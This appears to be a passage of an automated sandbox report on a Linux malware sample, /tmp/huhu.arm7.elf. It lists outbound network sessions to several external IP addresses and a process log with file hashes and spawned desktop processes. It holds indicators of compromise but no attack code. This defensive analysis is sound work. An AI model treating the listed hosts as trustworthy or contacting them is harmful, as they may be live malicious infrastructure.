                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21915192.168.2.235641819.83.181.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21916192.168.2.2335056103.163.152.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21917192.168.2.235191671.194.223.2518080
                                                TimestampBytes transferredDirectionData


                                                System Behavior

                                                Start time (UTC):06:06:53
                                                Start date (UTC):29/01/2024
                                                Path:/tmp/huhu.arm7.elf
                                                Arguments:/tmp/huhu.arm7.elf
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Start time (UTC):06:06:53
                                                Start date (UTC):29/01/2024
                                                Path:/tmp/huhu.arm7.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Start time (UTC):06:06:53
                                                Start date (UTC):29/01/2024
                                                Path:/tmp/huhu.arm7.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Start time (UTC):06:06:53
                                                Start date (UTC):29/01/2024
                                                Path:/tmp/huhu.arm7.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Start time (UTC):06:06:53
                                                Start date (UTC):29/01/2024
                                                Path:/tmp/huhu.arm7.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                                Start time (UTC):06:06:53
                                                Start date (UTC):29/01/2024
                                                Path:/tmp/huhu.arm7.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                                Start time (UTC):06:06:53
                                                Start date (UTC):29/01/2024
                                                Path:/tmp/huhu.arm7.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                                Start time (UTC):06:06:54
                                                Start date (UTC):29/01/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Start time (UTC):06:06:54
                                                Start date (UTC):29/01/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):06:06:55
                                                Start date (UTC):29/01/2024
                                                Path:/usr/libexec/gsd-print-notifications
                                                Arguments:/usr/libexec/gsd-print-notifications
                                                File size:51840 bytes
                                                MD5 hash:71539698aa691718cee775d6b9450ae2

                                                Start time (UTC):06:06:56
                                                Start date (UTC):29/01/2024
                                                Path:/usr/sbin/gdm3
                                                Arguments:-
                                                File size:453296 bytes
                                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                Start time (UTC):06:06:56
                                                Start date (UTC):29/01/2024
                                                Path:/etc/gdm3/PrimeOff/Default
                                                Arguments:/etc/gdm3/PrimeOff/Default
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):06:06:56
                                                Start date (UTC):29/01/2024
                                                Path:/usr/sbin/gdm3
                                                Arguments:-
                                                File size:453296 bytes
                                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                Start time (UTC):06:06:56
                                                Start date (UTC):29/01/2024
                                                Path:/etc/gdm3/PrimeOff/Default
                                                Arguments:/etc/gdm3/PrimeOff/Default
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c